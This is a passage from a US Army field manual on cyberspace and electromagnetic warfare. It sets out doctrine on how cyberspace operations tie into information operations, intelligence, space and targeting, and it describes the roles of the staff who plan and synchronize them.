cyberspace operations are inherently IRCs. As such, the IO element an d IO working group include cyberspace 
operations in the IRC synchronization process. A key responsibility of the IO  working  group is to help the 
IO element and, in turn, the commander and staff to understand that portion of cyberspace affecting 
operations,  how the threat is attempting to gain advantage in it, and how to prevent the threat from gaining 
an advantage in it.  
2-4. Commanders must understand the information environment and determine how the threat operates in 
that environment. Understanding begins wit h analyzing the threat's use of the information environment and 
IRC to gain an advantage. It continues with threat vulnerabilities friendly forces can exploit or must defend 
against with IRC. IO provides commanders an implementation strategy and integrativ e framework for 
employing IRC. Integrating cyberspace capabilities generates synergistic information environment effects. 
When employed as part of an information operation that includes multiple IRC, cyberspace operations can 
provide commanders an alternat ive solution to challenging operational problem sets. An integrated operation 
may include the use of cyberspace and the EMS to deliver IO products, observe enemy or adversary actions 
and reactions, or to deliver cyberspace or EW effects. IRC can provide co mmanders additional ways and 
means to — 
 Degrade, disrupt, or destroy threat capabilities that inform or influence decision  making.  
Chapter 2   
2-2 FM 3-12 11 April 2017   Degrade, disrupt, or destroy threat capabilities that command and control maneuver, fires, 
intelligence, communications, and i nformation warfare capabilities employed against friendly 
forces.  
 Deny, delay, or limit threat capabilities employed to gain situational awareness of friendly unit 
capabilities, status, intent, and exploitable vulnerabilities.  
 Deny, delay, or limit threat capabilities that track, monitor, and report on friendly unit activities, 
status, and disposition.  
 Degrade, disrupt, counter, or destroy threat capabilities that target and attack friendly mission 
command and related decision support systems.  
 Degrade, disr upt, counter, or destroy threat capabilities that distribute, publish, or broadcast 
information designed to persuade targeted foreign audiences or human networks to oppose 
friendly operations.  
 Degrade, disrupt, or destroy threat capabilities that distribut e, publish, or broadcast information 
designed to target friendly military and civilian audiences or human networks in an effort to 
influence morale and affect support for friendly operations.  
 Degrade, disrupt, or destroy threat capabilities that monitor an d protect critical threat networks  
and information pathways, as well as information in transit or at rest.  
 Enable military deception directed against threat decision  making, intelligence and information 
gathering, communications and dissemination, and command and control capabilities.  
 Enable friendly operations security to protect critical information and operationally vital details.  
 Enable friendly influence activities such as military information support operations to improve or 
sustain positive relat ions with foreign audiences in and around the operational area and to degrade 
threat influence over the same.  
 Enable friendly influence activities, such as military information support operations, to target 
threat military and civilian audiences or human n etworks in an effort to affect morale and support 
for threat operations and activities within the operational area.  
 Protect friendly information, technical networks, and decision -making capabilities from an 
exploitation by enemy and adversary information w arfare assets.  
Note . See FM 3 -13 for more about information operations.  
INTELLIGENCE  
2-5. Intelligence  supports cyberspace operations through the application of the intelligence process, IPB, 
and information collection. Intelligence at all echelons supports DODIN operations, DCO, and OCO planning 
and assists with defining measures of performance and measur es of effectiveness. The intelligence process 
leverages all sources of information and expertise, including  the intelligence community and non -intelligence 
entities to provide situational awareness to the commander and staff. Information gathered provides insight 
into enemy activities, capabilities, motivations, and objectives and enables the planning, preparation for, and 
execution of cyberspace and EW operations. Cyberspace planners need to leverage intelligence reach, 
analysis, reporting, and production capabilities provided by the intelligence warfighting function. This will 
enable cyberspace planners supporting operations throughout the operational environment. Intelligence 
assets coordinate with cyberspace planners , the G -6 (S-6), or the CEMA working g roup to use cyberspace 
capabilities for— 
 Enabling collection assets.  
 Linking intelligence capabilities.  
 Providing near real time analysis.  
 Providing information capabilities.  
 Information collection . 
Relationships with Cyberspace and the Electromagnetic Spectrum  
11 April 2017  FM 3 -12 2-3 INTELLIGENCE PREPARATION OF T HE BATTLEFIELD  
2-6. To define the cyberspace and EMS portions of the operational environment using IPB , the staff 
considers how the adversary or enemy utilizes cyberspace and the EMS to achieve their objectives.  
Identify ing the area of interest includes considering state and non -state actors with capability, access, and 
motivation to affect friendly operations. In the context of cyberspace and the EMS, the operational 
environment includes network topology overlays that gr aphically depict how information flows and resides 
within the operational area and how the network transports data in and out of the area of interest.  
2-7. Weather (terrestrial and space) affects cyberspace , EW, and signal  operations. In assessing 
environmental  effects on cyberspace, the staff considers key terrain in cyberspace in relation to the physical 
locations in the area of interest and the area of operations.  
2-8. Intelligence analysts, with support from other staff elements, evaluate enemy and adversary use of 
cyberspace  and the EMS . This includes evaluating aspects such as — 
 Adversary or enemy use of cyberspace and the EMS . 
 Reliance on networked capabilities.  
 Sophistication of cyberspace attack capabilities.  
 Cyberspace defense capabilities.  
 EW capabilities.  
 Motivation to conduct cyberspace operations against friendly forces.  
 Network vulnerabilities.  
 Ability to synchronize cyberspace operations with other operations.  
 Social media.  
2-9. When assessing the enemy or adversary courses of action, the intelligence staff c onsiders how the 
enemy or adversary will include cyberspace and EW in its operations. The commander and staff should 
consider threat courses of action in cyberspace when planning friendly operations. (See ATP 2 -01.3 for more 
information about IPB. ) 
INFORMA TION COLLECTION  
2-10. Requirements drive the intelligence process and information collection . At echelons corps and below, 
intelligence collection capabilities focus on the land domain. The analysis of intelligence derived from  all 
intelligence disciplines across all echelons including  theater  and national collection assets provides insight 
about enemy cyberspace and EW operations. Leveraging the information collection requirements process 
may support aspects of cyberspace and EW op erations.  Both the CEMA section and the G -6 (S-6) coordinate 
intelligence requirements with the G -2 (S-2) to ensure the necessary intelligence is available to plan, conduct, 
and assess cyberspace and EW operations.  
Note:  See FM 3 -55 for more material  on information collection . 
SPACE OPERATIONS  
2-11. The relationship between the space and cyberspace domains is unique. Space operations  depend on the 
EMS  for the transport of information and the control of space assets . Space operations  provide specific  
capability of transport through the space domain for long haul and limited access communications.  Space 
provides a key global connectivity capability  for cyberspace operations. Conversely, cyberspace operations 
provide a capability to exe cute space operations. This interrelationship is an important consideration across 
cyberspace operations, and particularly when conducting targeting in cyberspace.   
2-12. Many cyberspace operations occur  in and through the space domain via the EMS, resulting in an 
interdependent relationship between space and cyberspace. Space operations and the capabilities, limitations, 
and vulnerabilities of space -based systems affect support to cyberspace operations and the Army operations.  
2-13. Space and cyberspace operations complement each other, but also have mutually exclusive mission 
sets and processes. Space provides and supports global access to cyberspace operations through satellite 
Chapter 2   
2-4 FM 3-12 11 April 2017  communications. While satellite communications provides  links as part of the DODIN, the nature of satellite 
operations makes them significantly different from other terrestrial or air -based communications systems. 
Similarly, space relies on cyberspace and the EMS for command and control of satellite systems an d 
associated ground nodes. The Army relies on space -based capabilities that provide satellite communications, 
joint ISR, missile warning, environmental monitoring, positioning navigation and timing, and space control. 
Space -based systems, and the capabilit ies they support, enable the ability to plan, communicate, navigate, 
maneuver, and maintain battlefield situational awareness.  
2-14. Space is a joint and multinational domain that supports operations in each domain and is congested, 
contested, and competitive. S pace is congested due to the number of objects within key orbital areas, and the 
number is increasing. Space is increasingly contested due to the employment of capabilities denying free 
access to space. Finally, space is competitive, with greater numbers o f nations and commercial entities 
operating larger numbers of much smaller and more capable satellites than before. Friendly, neutral, enemy , 
and adversary communications may occur on the same satellite. Managing this congested, contested, and 
competitive space environment allows access to space and enables global cyberspace operations.  
2-15. The space domain consists of three segments: space, ground, and control. The segments interoperate 
to provide space -based capabilities and control. Control of the space doma in is interdependent with 
cyberspace operations. Examples of integrated space and cyberspace components are — 
 DODIN operations  with network transport  and information services relate to space -based 
communications systems to provide the long haul network transport and a direct connection to the 
tactical portion of the network in a complex, beyond line -of-sight environment.  
 DCO support defensive space control planning and execution to protect and defend the DOD 
cyberspace capabilities and designated systems.  
2-16. Coordinating cyberspace, EW , and space operations enables commanders and staffs at each level to 
synchronize and integrate capabilities and effects. Space -based capabilities enable distributed and global 
cyberspace operations. Cyberspace and space -based capabilities provide responsive and timely support from 
the highest echelons down to the tactical level commander. Coordinating with EW operation s is necessa ry to 
ensure availability of the EMS  and to prevent spectrum conflicts . 
TARGETING  
2-17. Targeting  is the means by which commanders and staffs pair targets with effects in and through 
cyberspace or the EMS. Through the MDMP, the staff identifies  the high value targets and high pay-off 
targets , and through the CEMA working group identif ies targets that may qualify for targeting using effect s 
from  cyberspace or EW operations . The common operational picture, DCO, cyber space security information, 
information collection efforts, and the desired operational outcomes also guide targeting efforts. Army forces 
plan and execute (with proper authorities) effects on, in , and through cyberspace and the EMS using available 
capabilities. Units synchronize eff ects with the next higher command. (See chapter 3 for more information 
on applying targeting principles. ) 
 
11 April 2017  FM 3 -12 3-1 Chapter 3   
Cyberspace Electromagnetic Activities  within  Operations  
This chapter describes Army cyberspace electromagne tic activities within operations 
including  fundamentals of cyberspace electromagnetic activities ; the commander ’s 
role; planning, integrating and synchronizing cyberspace electromagnetic activities  
with the warfighting functions ; and the commander’s  resources that have effects on, 
in, and through cyberspace and the electromagnetic spectrum . This chapter discusses 
the contribution of cyberspace operations planning factors into the operations process 
to include planning, preparing, executing, and asses sing with a section on targeting. 
The discussion of the operational environment is combined with the military decision -
making process followed by an overview of preparation requirements, execution 
tactics, and assessments for  cyberspace operations.  
FUNDAME NTALS  
3-1. Commanders and their staffs conduct CEMA to plan, integrate , and synchronize cyberspace and EW 
operations as a unified effort to project power in and through cyberspace and the EMS . Executing  cybersp ace 
and EW operations enables the Army to  secure and defend friendly force networks, and to protect personnel, 
facilities, and equipment. SMO enables CEMA by  ensuring access and deconfliction for the Army’s use of 
the EMS. Planning, integration , and synchr onization of the  interrelated actions  support the overall mission . 
3-2. Conducting cyberspace operations and EW operations  independently may detract from their efficient 
employment. If uncoordinated, these activities may result in conflicts and mutual interfere nce internally  with 
other entities that use the EMS.  Conflicts and interference may result in the in ability to communicate, loss of 
intelligence, or the degradation of EP systems capabilities.  
CONSIDERATIONS  
3-3. Only forces with proper legal and command authority can create offensive effects , including  DCO -
RA, in cyberspace or the EMS. Commanders have the authority to secure and defend their portion of the 
DODIN -A. All echelons can plan cyberspace and EW operation s. Echelons that do not have organic 
capabilities or authorities for cyberspace or EW operations may integrate supporting effects from forces with 
those with capabilities to support operations. The approval authority to execute the cyberspace and EW 
operat ions is described in the operations orders.  
3-4. Commanders when authorized, employ cyberspace and EW operations to shape the environment and 
support offensive and defensive operations. Information collection and intelligence production efforts may 
provide info rmation leading the commander and staff to identify targets eligible for effects through 
cyberspace or the EMS. OCO  effects may require proximity to a target for implementation, depending on the 
asset used to deliver the effects. If commanders determine th ere is a requirement for OCO , the staff 
determines whether the capability and authority reside within the unit through the normal targeting process. 
The staff uses the CERF to request for OCO if the capability does not exist in the unit  or supporting force s. 
3-5. The defense -in-depth approach to the DODIN integrates defen se actions  at all echelons. Global  and 
regional efforts establish baseline secur ity and defen se of  the DODIN. Commanders a t echelons corps to 
brigade  are responsible for defending their portion of the network.  Personnel from corps to brigade echelons 
also defend their portion of the network within their capabilities. Units may coordinate for external support 
as required  if the capability to defend the network does not exist in the unit. Support m ay be provided 
remotely or on -site. Defense -in-depth allows for network -wide situational awareness , trend  analysis , and 
focused security and defense efforts.  
Chapter 3   
3-2 FM 3-12 11 April 2017  3-6. Collaboration of cyberspace operations occurs within a secure environment. At the appropriate level, 
access to a sensitive  compartmented information facility  (SCIF)  or temporary SCIF  is required for planning, 
synchronization , and the assembly of the staff members for truly effective collaboration. The corps, division, 
and brigade must have access to a SCIF  or temporary SCIF  space for the purpose of cyberspace operations 
collaboration in the command posts.  
3-7. All automated information systems in the Army are pa rt of cyberspace. The actions taken to expand, 
reduce, defend, and use the DODIN directly affect mission command and warfighting functions. During the 
exercise of mission command, commanders consider effects to cyberspace and their impact on operations. 
The freedom of maneuver  in cyberspace directly impacts the commander’s ability to synchronize warfighting 
functions. The commander can attain and maintain freedom of maneuver  to support freedom of maneuver 
across all domains through organic and nonorganic ca pabilities on, in , and through cyberspace and the EMS.  
3-8. All warfighting functions use the DODIN as the primary collaboration medium for mission command 
synchronization. The DODIN supports and enables each of the warfighting functions, tasks, and missions 
that contribute to the overall operation. Providing access to, securing, and defending the network enables 
enhanced capabilities for the commander and staff. The individual warfighting functions use the DODIN for 
daily activities and require access to local and distant services.  
COMMANDER’S ROLE  
3-9. Commanders  exercise mission command to synchronize the warfighting functions (ADRP 6 -0). They 
are able to understand, visualize, describe, direct, lead , and ass ess courses of action. Commanders must 
consider cyberspace and EW operations at all times, whether in a tactical environment or in home station. 
Commanders  leverage cyberspace and EW operations as part of combined arms operations to achieve 
objectives in t he natural domains, cyberspace, and the EMS th rough lethal and nonlethal means.  
3-10. Commanders should — 
 Include cyberspace and EW operations within the operations process.  
 Continually enforce cybersecurity standards and configuration management.  
 Understand cybe rspace and EW effects, capabilities, constraints, and limitations, including  second 
and third order effects.  
 Understand the legal and operational authorities to affect threat portions of cyberspace or EMS.  
 Understand the implications of cyberspace and EW operations on the mission and scheme of 
maneuver.  
 Understand how the selected course of action affects the prioritization of resources to their portion 
of the DODIN.  
 Leverage effects in and through cyberspace and the EMS to support the concept of operation s. 
 Develop and provide intent and guidance for actions and effects inside and outside of the DODIN 
(examples are  conduct cyber space security, conduct EMS deconfliction, and create effects in and 
through cyberspace and the EMS).  
 Identify  critical mission or  tasks by phase to enable identificati on of key terrain in cyberspace.  
 Ensure cyberspace operations  and EW are integrated into all processes ( including  operations, 
intelligence, and targeting).  
 Ensure active collaboration across the staff, subordinate unit s, higher headquarters, and unified 
action partners to enable shared understanding of cyberspace and the EMS.  
 Consider legal implications along with operational authorities and the opportunities and risks they 
present for operations in cyberspace and the E MS. 
 Approve high -priority target lists, target nominations, collection priorities, and risk mitigation 
measures for operation in cyberspace and the EMS.  
 Create massed effects by synchronizing cyberspace operations with lethal and nonlethal actions 
to suppo rt the concept of operations.  
 Anticipate and account for related second - and third -order effects in cyberspace and the EMS.  
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-3  ENABLING RESOURCES  
3-11. Echelons corps to brigade  have the resources  available t o execute CEMA. The available resources 
enable operating in cyberspace  and the EMS  and affecting enemy and adversary cyberspace  and use of the 
EMS to provide freedom of maneuver . The staff sections and nonorganic support provide the mission support 
for ope rations at echelons corps and below.  
3-12. All commanders  from echelons corps to brigade  have organic assets to plan DODIN operations, OCO, 
DCO, and EW operations. Organic resources at echelons corps and below include, but are not limited to, the 
EWO ( cyberspace  planner ), the G -2 (S-2) section, the G-6 (S-6) section, signal company , spectrum manager , 
and other EW personnel. Together, they provide and secure the network at their level to enable 
synchronization of the warfighting functions and the ability to communicate with other units and echelons. 
Some commanders have the organic assets to prepare, e xecute and assess EW operations.  
3-13. Nonorganic assets enhance the organic capabilities by providing additional personnel and equipment 
to meet mission requirements. Expeditionary signal, joint EW capabilities, cyberspace mission forces, and 
national agencies provide additional assets based on operational requirements and requires coordination to 
ensure the appropriate equipment and personnel are provided. Units can request support for nonorganic 
capabilities to provide effects on, in , and through cyberspace an d the EMS.  
3-14.  Critical enablers that support the Army’s defense -in-depth include the Army Cyber Operations and 
Integration Center and the regional cyber centers. The Army Cyber Operations and Integration Center is an 
operational element of the ARCYBER headqu arters and is the top -level control center for a ll Army 
cyberspace activities. It provides situational awareness and DODIN operati ons reporting for the DODIN -A. 
The center coordinates with the regional cyber centers and provides operational and technical s upport as 
required.  
3-15. The regional cyber center is the single point of contact for operational status, service provisioning, 
incident response , and all Army network services  in its assigned theater . It coordinates directly with tactical 
units to provide DODI N-A services , support  to DODIN operations , and when required DCO to enable 
mission command and the warfighting functions.  
RESPONSIBILITIES AT CORPS AND BELOW  
3-16. Army forces at echelons corps and below plan , integrate, and synchronize  all aspects of cyberspace  
and EW operations . Commanders and staffs synchronize cyberspace and EW operations with all warfighting 
functions to create complementary and reinforcing effects. The commanders and staff elements execute 
CEMA to support the commanders’ objectives.  Executing CEMA provides an advantage to maintain freedom 
of maneuver  in cyberspace and the EMS. Coordinating and synchronizing the efforts of staff elements ensures 
available information is concentrated to make an appropriate decision based on impacts to c urrent operations 
and the commanders’ objectives.   
Staff  Responsibilities  
3-17. Support to cyberspace operations and EMS control is provided internally as the staff execute CEMA 
and collaborates to plan, coordi nate, integrate, prepare for, and conduct (as required) cyberspace operations. 
After CEMA collaboration, the staff can — 
 Advise the commander on the capabilities, limitations, and effects of cyberspace  and EW specific 
to the unit mission, cyberspace threat,  commander’s intent and concept of operations, legal 
authority, and rules of engagement.  
 Develop and provide OCO courses of action to support  the scheme of maneuver, facilitate OCO 
missions as directed , and  coordinate and integrate DCO -RA with DCO and DODI N operations , 
as required.  
 Ensure integration and synchronization of cyberspace and EW operations into the schemes of 
maneuver and fires.  
 Collect, process, store, display, disseminate , and protect information relevant to cyberspace 
operations.  
Chapter 3 
3-4 FM 3-12  11 April 2017 Coordinate and collaborate across the warfighting functions and with external entities (staff
counterparts at higher and lower echelons, adjacent units, and the intelligence community) to
facilitate and employ cyberspace operations.
Corps to Brigade-Level Cyberspace Electromagnetic Activities 
3-18. These tactical echelons employ organic and coordinate for nonorganic capabilities, outside and inside 
of the DODIN, to accomplish various DODIN operations, DCO, OCO, and EW functions and tasks to support 
Army operations. DCO-IDM capabilities reside at these echelons, and the staff coordinates and synchronizes 
for nonorganic DCO-IDM support. (See FM 3-94 for additional information regarding the corps to brigade 
roles and responsibilities.) The staff may integrate nonorganic cyberspace and EW forces as authorized and 
required. 
Cyberspace Electromagnetic Activities Outside of the Department of Defense Information Network 
3-19. The corps and below commanders and staffs plan, integrate, and synchronize for cyberspace and EW 
operations outside of the DODIN. These echelons only execute actions outside the DODIN with the proper 
authority. The key staff members involved in these activities include the G-2 (S-2), G-3 (S-3), EWO, and fire 
support coordinator. The following list of activities is not a ll-inclusive. The corps and below commander and 
staff— 
Plan, request, and synchronize effects in cyberspace and the EMS supporting freedom of
maneuver.
Coordinate with higher headquarters staff to integrate and synchronize information collection
efforts to support cyberspace and EW operations.
Synchronize cyberspace and EW effects requests with organic targeting capabilities.
Prepare and submit effect requests using the CERF or electronic attack request format (EARF).
Develop, maintain, and disseminate a common operational picture of designated cyberspace and
EMS to enable situational understanding.
Prepare for cyberspace and EW operations by conducting information collection activities,
technical rehearsals, and pre-operation checks and inspections.
Conduct SMO for the headquarters and subordinate units within the area of operations.
Cyberspace Electromagnetic Activities Inside of the Department of Defense Information Network 
3-20. The corps and below commanders and staffs plan, prepare, and synchronize for cyberspace and EW 
operations occurring primarily inside of the DODIN. The key staff members involved in these activities 
include the G-2 (S-2), G-3 (S-3), G-6 (S-6) (supported by the corps network operations and service center 
and corps signal company), and EWO. The following list of activities is not all-inclusive. The corps and 
below commander and staff — 
Plan, coordinate, prepare for, and conduct DODIN operations and DCO-IDM.
Oversee and direct the planning, operations, and coordination of network transport, information
services, and SMO.
Establish the unit’s portion of the DODIN and provide operational and technical support to
subordinate elements.
Design, build, configure, secure, operate, maintain, and sustain the network.
Provide DODIN operations and management facilities including a network command element,
cyberspace security, and communications security account.
Establish and implement procedures for relevant information and information systems to develop
and disseminate the common operational picture.
Coordinate with the regional cyber center for matters concerning event and incident management,
networthiness violations, DODIN operations tools, and cyberspace security tools.
Plan, coordinate, integrate, prepare for, and conduct EW operations.
Conduct SMO for the headquarters and subordinate units within the area of operations.
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-5  Perform fault, configuration, accounting, performance, and security management of network 
system components and services to ensure systems and software applications meet the 
command er’s operational requirements.  
 Receive and integrate cyber protection teams and other enablers as directed by higher headquarters 
to support  brigade DCO . 
 Prepare and submit effect requests using the CERF, as required.  
 Oversee and direct the planning, opera tions, and coordination of matters concerning DODIN 
operations, network transport, information services , and SMO for the corps and below 
headquarters and assigned units.  
 Establish communication s systems in area of operations and recommend DODIN operations 
priorities to support the commander’s priorities.  
3-21. Each of the staff elements has specific responsibilities that contribute to CEMA. The nucleus of CEMA 
are a coordination of actions, functions, and tasks with cyberspace  and EMS  implications. Operations whi ch 
require targeting, defending the unit’s portion of the DODIN, and integrating new equipment are examples 
of activities specific staff elements execute and coordinate with other staff elements as part of CEMA.  (See 
figure 3 -1 on page 3 -6.) 
Chapter 3   
3-6 FM 3-12 11 April 2017  Figure 3 -1. Cyberspace electromagnetic activities  coordination and synchronization  
Cyberspace Electromagnetic Activities  Section  
3-22. The CEMA section  of the G -3 (S-3) from brigade to corps  coordinates and synchronizes cyberspace 
and EW operations for effective collaboration across staff elements. This section includes the EWO  (who 
has additional responsibility as the cyberspace planner ), the spectrum manager, the EW technician , and EW 
noncommissioned office rs. The CEMA section is key to the collaboration of cyberspace and EW operations. 
The cyberspace planner understands the operations and missions of the unit and the commander’s intent. The 
CEMA section participates in the planning and targeting process, an d leads the CEMA working group to 
support the MDMP.  The cyberspace planner requests for effects provided by non -organic resources.   
Electronic Warfare Officer (Cyberspace Planner)  
3-23. The EWO serves as the commander’s designated staff officer for the planning, integration, 
synchronization, and assessment of cyberspace and EW  operations . The EWO collaborates with other 
members of the staff to integrate cyberspace and EW operations into the comma nder’s concept of operations. 
As the cyber space  planner, the EWO is responsible for understanding policies relating to cyberspace, EW, 

Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-7 and SMO to provide accurate information to the commander for proper planning, coordination, and 
synchronization of cybers pace operations, EW , and SMO. Cyberspace planners (EWO) — 
 Integrate, coordinate, and synchronize ef fects in cyberspace and the EMS . 
 In coordination with the appropriate legal support, advises the commander on effects in cyberspace 
(including associated rule s of engagement, impacts, and constraints).  
 Develop and maintain the consolidated cyberspac e target synchronization matrix and place on the 
units’ target synchronization matrix.  
 Nominate OCO and EW targets for approval from the fire support coordinator and  commander.  
 Receive, vet, and process OCO and EW targets from subordinate units.  
 Develop and prioritize effects in cyberspace and the EMS . 
 Develop and prioritize targets with the fire support coordinator.  
 Monitor and continually assess measures of performance and measures of effectiveness of 
cyberspace and EW operations.  
 Coordinate targeting and assessment collection with higher, adjacent, and subordinate 
organizations or units.  
 Advise the commander and staff on plan modifications, based on the asse ssment.  
 Advise the commander on how cyberspace and EW effects can impact the operational 
environment.  
 Receive and integrate cyberspace operations team(s) and capabilities.  
 Coordinate for OCO support on approved targets.  
 Provide recommendations on commander ’s critical information requirements.  
 Prepare and process the CERF and the EARF.  
 Participate in other cells and working groups, as required, to ensure integration of cyberspace and 
EW operations . 
 Deconflict  EW operations with the spectrum manager.  
 Coordina te the CEMA working group to plan and synchronize cyberspace and EW operations.  
 Assist the G -2 (S-2) during IPB , as required . 
 Provide information requirements to support planning, integration , and synchronization of 
cyberspace and EW operations.  
 Serve  as the Jam Control Authority (JCA) for EW operations as directed by the commander.  
 Assist  in the mission command of cyberspace operations as directed by the commander.  
Electronic Warfare Personnel  
3-24. The EWO , EW technician , or EW noncommissioned officer  plans, coordinates, and supports EW as 
part of CEMA. EW personnel — 
 Plan, coordinate, and assess EA, EP, and ES requirements.  
 Support the G -2 (S-2) during IPB.  
 Provide information collection requirements to the G -2 (S-2) to support the assessment, planning, 
preparation, and execution of EW.  
 Support the fire support coordinator to ensure the integration of EA with all other effects.  
 Provide tactical targeting information derived from EW support to the fire support coordinator.  
 Prioritize EW effects and targets with the fire support coordinator.  
 Plan and coordinate EW operations across functional and integrating cells.  
 Deconflict EW operations with the  spectrum manager.  
 Maintain a current assessment of available EW resources.  
 Participate in cells and working groups (as required) to ensure EW integration.  
 Serve as EW subject matter expert on existing EW rules of engagement.  
 When designated, serve as the EW jamming control authority.  
Chapter 3   
3-8 FM 3-12 11 April 2017   Prepare, submit for approval, and supervise the issuing and implementation of the EW portion of 
orders.  
 Synchronize EW operations with the G -2 (S-2) to prevent conflicts with information collection 
activities.  
Cyberspace Elect romagnetic Activities  Section Spectrum Manager  
3-25. The CEMA section spectrum manager ’s role is to plan and synchronize EP; integrate and synchronize 
operational spectrum considerations across cyberspace  and EW operations; and collaborate with the G -6 (S-
6) spectrum manager on EW issues affecting SMO . (See ATP 3 -36 for more information on spectrum 
management operations. ) In support  of CEMA the spectrum managers — 
 Lead , develop, and synchronize the EW -EP plan by assessing EA effects on friendly force 
emitters.  
 Mitigate harmful impact of EA on friendly forces through coordination with higher and 
subordinate units.  
 Synchronize with intelligence on the EA effects to support  intelligence gain and loss 
considerations.  
 Synchronize cyberspace operations to protect radio frequency enabled transport layers.  
 Coordinate to support protecting radio frequency enabled  IO. 
 Collaborate with staff, subordinate, and senior organizations to identify unit emitters for inclusion 
on the joint restri cted frequency list.  
 Perform EW related documentation and investigation of prohibitive electromagnetic interference 
to support the G -6 (S-6) led joint spectrum interference resolution program.  
 Participate in the CEMA working group to deconflict EMS requir ements.  
 Provide advice and assistance in the planning and execution of spectrum portions of cyberspace 
and EW operations.  
Assistant Chief of Staff, G -6 (S-6), Signal  
3-26. The G -6 (S-6) staff conducts informati on management and facilitates knowledge management at 
theater and below levels. In collaboration with the joint force and multinational forces (as appropriate), the 
G-6 (S-6) staff directly or indirectly supports cyberspace operations by conducting DODIN o perations.  (For 
more information on DODIN operations and responsibilities, see FM 6 -02.) The G -6 (S-6) is the primary 
staff representative responsible for SMO. The G -6 (S-6) staff — 
 Assists the commander by establishing a tactical information network at the ater levels and below 
to enable mission command.  
 Conducts DODIN operation processes and network defense activities.  
 Assists in the development of the cyberspace threat characteristics specific to enemy and adversary 
activities and related capabilities with in friendly networks, and then advises on cyberspace 
operations courses of action.  
 Conducts DCO -IDM  risk assessments based on enemy or adversary  tactics, techniques, and 
procedures ; to identify vulnerabilities  to key infrastructure that may require protection measures 
that exceed unit capabilities.  
 Provides information on friendly cyberspace for situational awareness.  
 Participates in the CEMA working group to deconflict friendly EMS requirements, support 
operations with communications requirements, p rovide DODIN operational picture for planning 
purposes, and provide subject matter expert information on wired and wireless networks.  
 Coordinates for intelligence support to defense of the network.  
 Ensures network is configured and monitored based on threa t reports . 
 Ensures defens e-in-depth by effectively employing cybersecurity tools to provide network 
security status visibility to higher unit  network operations security centers, supporting regional 
cyber centers, and the Army Cyber Operations and Integrat ion Center . 
Cyberspace Electromagnetic Activities within Operations  
11 April 2017  FM 3 -12 3-9  Coordinates with the supporting regional cyber center to ensure cybersecurity policy compliance ; 
internet protocol address advertisement, identity , and access management ; reporting requirements ; 
and incident response procedures.  
 Requests satell ite and gateway access through the regional satellite communications support 
center.  
 Coordinates with regional hub node to establish netw ork connectivity and services.  
Spectrum Manager  
3-27. The spectrum manager coordinates EMS  use for a wide variety of communications and electronic 
resources. The spectrum manager — 
 Issues the signal operating instructions.  
 Provides spectrum resources to the organization.  
 Coordinates for spectrum usage with higher echelon G -6 (S -6), applicable ho st-nation, and 
international agencies as necessary.  
 Coordinates the preparation of the joint restricted frequency list and issuance of emissions control 
guidance.  
 Coordinates frequency allotment, assignment, and use.  
 Coordinates electromagnetic deception p lans and operations in which assigned communications 
resources participate.  
 Coordinates measures to mitigate electromagnetic interference or natural phenomena.  
 Coordinates with higher echelon spectrum managers for electromagnetic interference resolution 
that cannot be resolved internally.  
 Assists the EWO in issuing guidance to the unit (including subordinate elements) regarding 
deconfliction and resolution of interference problems between EW systems and other friendly 
systems.  
 Participates in the CEMA worki ng group to deconflict friendly EMS requirements with planned 
EW, cyberspace operations, and information collection.  
Assistant Chief of Staff, G -2 (S-2), Intelligence  
3-28. The G -2 (S-2) provides intellig ence to support CEMA. The intelligence staff facilitates understanding 
the enemy, terrain ( including  weather), and civil considerations. The G -2 (S-2) staff provides direct or 
indirect support to cyberspace and EW operations through information collection, support to situational 
understanding, and support to targeting and information capabilities. The G -2 (S-2)— 
 Provides all -source intelligence support to CEMA.  
 Coordinates with the intelligence community to help establish attribution for associated threat -
initiated cyberspace, EA, or exploitation activities.  
 Requests intelligence support and collaborates with the intelligence community for intelligence 
support to cyberspace and EW operations.  
 Assists the commander and staff by providing information and intelligence on enemy and 
adversary cyberspace and EW threat characteristics. This facilitates situationa l understanding and 
supports decision  making.  
 Submits information requests to fill gaps identified during the MDMP.  
 Ensures the information collection plan supports the target acquisition and combat assessment for 
targets.  
 Collects, processes, stores, disp lays, and disseminates cyberspace and EW operations relevant 
information throughout the operations process and through the use of the mission command 
system.  
 Contributes EP input for the joint restricted frequency list.  
 Participates in the CEMA working gro up to intelligence support to planned cyberspace and EW 
operations.  
 Develops cyberspace and EMS aspects  of IPB . 
Chapter 3   
3-10 FM 3-12 11 April 2017   Coordinates for all source intelligence support to cyberspace and EW operations.  
Information Operations Officer  
3-29. The information operations officer  (or assigned IO representative) integrates designated IRC and other 
capabilities a commander may use for IO , including coordinating for IO capabilities  using cyberspace and 
the EMS . This staff officer is the p rimary advisor to the commander on ways to shape operational activity in 
and through the information environment and cyberspace that will degrade enemy or adversary decision  
making and protect our own. When integrating CEMA, the IO staff officer — 
 Continual ly assesses IO implemented in and through cyberspace and the EMS and makes 
necessary adjustments.  
 Identifies information capabilities and infrastructure s in the area of operations that will impact the 
conduct of cyberspace and EW operations . 
 Nominates and coordinates targets to the CEMA working group to integrate and deconflict effects 
with other information -related capability effects.  
 Provides requirements for the information collection plan to enhance understanding and 
visualization of cyberspace aspects of the information environment within the operational area.  
 Participates in the CEMA working group to coordinate IO requirements with planned cyberspace 
and EW operations.  
 Coordinates cyberspace and EW operations support to IO.  
Fire Support  
3-30. Fire cells plan, coordinate, integrate, synchronize, and deconflict fire support, current and future, for 
the command including  Army, joint, interorganizational, and multinational partners, as appropriate. Through 
targeting, CEMA are integrated and synchronized by the EWO. For CEMA, the fire support personnel — 
 Review target nominations for inclusion to and verify addition on the j oint integrated prioritized 
target list.  
 Lead the targeting working group and participate in the targeting board.  
 Provide input to the information collection plan and designate targets in coordination with the 
analysis and control element.  
 Participate in t he CEMA working group to deconflict targeting and fires requirements with 
cyberspace and EW operations.  
 Ensure the synchronization of cyberspace and EW effects through the fires synchronization 
matrix.  
Staff Judge Advocate  
3-31. The staff judge advocate and staff advises the commander and the CEMA working group with respect 
to operational law and cyberspace actions, particularly if cyberspace operations may affect noncombatants. 
The staff judge advocate — 
 Ensures cyberspace and EW actions comply with applicable policies and laws.  
 Reviews potential cyberspace and EW  operations according to  relevant legal frameworks and 
authorities granted at national and regional command levels.  
 Participates in the CEMA working group to provide legal adv ice on cyberspace and EW 
operations, as required.  
Cyberspace Electromagnetic Activities  Working Group  
3-32. The CEMA working group is accountable for integrating cyberspace and EW op erations and related 
